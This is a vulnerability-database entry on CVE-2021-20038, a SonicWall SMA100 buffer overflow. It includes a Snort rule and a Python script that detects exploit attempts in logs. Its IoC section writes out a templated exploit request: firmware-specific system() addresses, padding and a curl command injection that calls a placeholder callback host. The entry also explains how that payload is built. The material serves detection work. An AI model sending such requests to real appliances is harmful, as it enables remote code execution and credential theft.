CVE-2021-20038
published 2021-12-08


Priority: P1 (100), critical, 9.8 CVSS 3.1
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, Exploit, Ransomware, Initial access
CISA Known Exploited Vulnerability, due 2022-02-11
Exploited in the wild
EPSS: 99.91% (100.0th percentile)
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.

Affected

18 ranges
Vendor      Product                  Version range    Fixed in
sonicwall   sma_200_firmware
sonicwall   sma_200_firmware
sonicwall   sma_200_firmware
sonicwall   sma_210_firmware
sonicwall   sma_210_firmware
sonicwall   sma_210_firmware
sonicwall   sma_400_firmware
sonicwall   sma_400_firmware
sonicwall   sma_400_firmware
sonicwall   sma_410_firmware
sonicwall   sma_410_firmware
sonicwall   sma_410_firmware
sonicwall   sma_500v_firmware
sonicwall   sma_500v_firmware
sonicwall   sma_500v_firmware
sonicwall   sonicwall_sma100
sonicwall   sonicwall_sma100
sonicwall   sonicwall_sma100

Detection & IOCs (extracted from sources)

command:
GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat("A", 518)}} HTTP/1.1

snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1"; flow:established,to_server; urilen:>400; threshold: type threshold, track by_src, count 10, seconds 30; http.request_line; content:"GET /%"; startswith; pcre:"/^[a-zA-Z0-9]{2}[%a-zA-Z0-9]{9}(?P<addr>(?:[%a-zA-Z0-9]{3}){4})(?P=addr)/R"; content:"%64%b8%06%08"; within:55; fast_pattern; content:"?"; reference:cve,2021-20038; classtype:attempted-admin; sid:2034984; rev:2; metadata:attack_target Server, created_at 2022_01_26, cve CVE_2021_20038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)

bytes: %64%b8%06%08
bytes: %08%b7%06%08
bytes: %04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf
  • The exploit payload encodes a stack address (%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf) followed by a system() address specific to the firmware version, then a shell command injection via brace expansion (curl), and a 518-byte 'A' padding — all within a single GET request URI.
  • Two distinct system() address values are used depending on firmware version: %08%b7%06%08 targets firmware 10.2.1.2-24sv, and %64%b8%06%08 targets firmware 10.2.1.1-17sv/19sv.
  • The vulnerability is in the SMA100 Apache httpd mod_cgi module environment variables; code executes as the 'nobody' user. Affected appliances: SMA 200, 210, 400, 410, 500v.
  • UNC6148 threat actor exploited CVE-2021-20038 (among other n-days) to steal administrator credentials before the targeted SMA appliance was updated to firmware 10.2.1.15-81sv. Credential theft artifact: persist.db database and certificate files.
  • OVERSTEP rootkit is deployed as a .ELF file decoded from base64 on SMA 100 series appliances; it establishes a reverse shell, steals passwords, and hides components using user-mode rootkit capabilities. Analysts should acquire disk images to detect it, as the rootkit interferes with live forensics.
  • OVERSTEP can steal sensitive files such as the persist.db database and certificate files, which give hackers access to credentials, OTP seeds, and certificates that allow persistence.
  • Threshold-based detection: trigger on 10 or more exploit attempts from the same source IP within 30 seconds to reduce false positives.
  • The system() address offsets in the exploit payload are firmware-version-specific. %08%b7%06%08 applies only to 10.2.1.2-24sv and %64%b8%06%08 applies only to 10.2.1.1-17sv/19sv; detections relying solely on one address will miss exploitation attempts targeting the other firmware version.
  • The Nuclei template uses a clusterbomb attack combining two prefix_addr and two system_addr payloads, requiring up to 2 HTTP requests (max-request: 2) to cover both firmware variants — detection infrastructure must account for multi-request exploit sequences.
  • Incident responders could not confirm which specific vulnerability UNC6148 exploited for initial credential theft; CVE-2021-20038 is one of several candidates (also CVE-2024-38475, CVE-2021-20035, CVE-2021-20039, CVE-2025-32819).
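As an added example (not code from this page, from SonicWall, or from the Emerging Threats ruleset), the following Python script re-implements the logic of the Snort rule above on the log side: a GET whose URI starts with "/%" and exceeds 400 bytes, the repeated 4-byte stack-address pattern from the rule's pcre, one of the firmware-specific system() addresses within 55 bytes of that match, a "?" in the URI, and the 10-hits-in-30-seconds per-source threshold. It generalizes the M1 rule to both addresses listed in the IoCs, so a single pass catches attempts against either firmware version. All log lines, IP addresses and function names are constructed for the example; the address bytes are the ones listed on the page.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Added example (not the page's or the ET ruleset's code): a log-side re-implementation of the
# Snort rule's logic for CVE-2021-20038, extended to both firmware-specific system() addresses.

# system() addresses from the page's IoC list, keyed to the firmware they target
SYSTEM_ADDRS = {
    "%64%b8%06%08": "10.2.1.1-17sv/19sv",
    "%08%b7%06%08": "10.2.1.2-24sv",
}
STACK_ADDR = "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"  # stack address from the page's IoC list

URI_MIN_LEN = 400          # urilen:>400
WITHIN = 55                # within:55 after the pcre match
THRESHOLD_COUNT = 10       # threshold: count 10
THRESHOLD_SECONDS = 30     # threshold: seconds 30

# The rule's pcre, applied relative to the end of "GET /%": two hex digits of the first encoded
# byte, nine more characters, then a 4-byte percent-encoded address that repeats immediately.
ADDR_RE = re.compile(r"^[a-zA-Z0-9]{2}[%a-zA-Z0-9]{9}(?P<addr>(?:[%a-zA-Z0-9]{3}){4})(?P=addr)")

# Apache common-log prefix: ip - - [ts] "METHOD URI PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+'
)


def match_request(method, uri):
    """Return the firmware variant a request appears to target, or None if it does not fit the signature."""
    if method != "GET" or not uri.startswith("/%") or len(uri) <= URI_MIN_LEN:
        return None
    rest = uri[2:]                      # the /R anchor: everything after "GET /%"
    m = ADDR_RE.match(rest)
    if not m:
        return None
    window = rest[m.end():m.end() + WITHIN]
    for addr, firmware in SYSTEM_ADDRS.items():
        if addr in window and "?" in uri:
            return firmware
    return None


def detect(lines):
    """Apply the per-source threshold (10 matching requests in 30 s) and return alert records."""
    recent = defaultdict(deque)         # source IP -> timestamps of matching requests
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        firmware = match_request(m["method"], m["uri"])
        if firmware is None:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
        window = recent[m["src"]]
        window.append(ts)
        while ts - window[0] > THRESHOLD_SECONDS:
            window.popleft()
        if len(window) >= THRESHOLD_COUNT:
            alerts.append({"src": m["src"], "firmware": firmware,
                           "count": len(window), "last_seen": m["ts"]})
            window.clear()              # like Snort's threshold: one alert per `count` hits
    return alerts


# --- constructed sample log (not real traffic) ------------------------------------------
def exploit_shaped_uri(system_addr):
    """Address block plus the 518-byte padding; the command portion of the payload is omitted."""
    return "/" + STACK_ADDR + system_addr + "?" + "A" * 518


def log_line(src, second, method, uri, status="200"):
    return f'{src} - - [08/Dec/2021:10:00:{second:02d} +0000] "{method} {uri} HTTP/1.1" {status} 512'


SAMPLE_LOG = [
    log_line("198.51.100.20", 0, "GET", "/cgi-bin/welcome"),
    *[log_line("203.0.113.10", i, "GET", exploit_shaped_uri("%64%b8%06%08"), "500") for i in range(12)],
    log_line("203.0.113.10", 13, "GET", "/" + "A" * 600),     # long URI but no address pattern
    *[log_line("198.51.100.7", 20 + i, "GET", exploit_shaped_uri("%08%b7%06%08"), "500") for i in range(2)],
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"ALERT {a['src']}: {a['count']} attempts against firmware {a['firmware']} (last {a['last_seen']})")
```

On the constructed sample, only 203.0.113.10 crosses the threshold (12 matching requests in 12 seconds); the two requests from 198.51.100.7 match the signature but stay below the count, which is the false-positive trade-off the Snort rule's threshold makes as well. A responder who wants every single attempt logged rather than only threshold crossings can return the per-request matches from match_request directly.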

CVSS provenance

nvd v3.1: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
nvd v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
vulncheck: 9.8 CRITICAL
cisa: 9.8 CRITICAL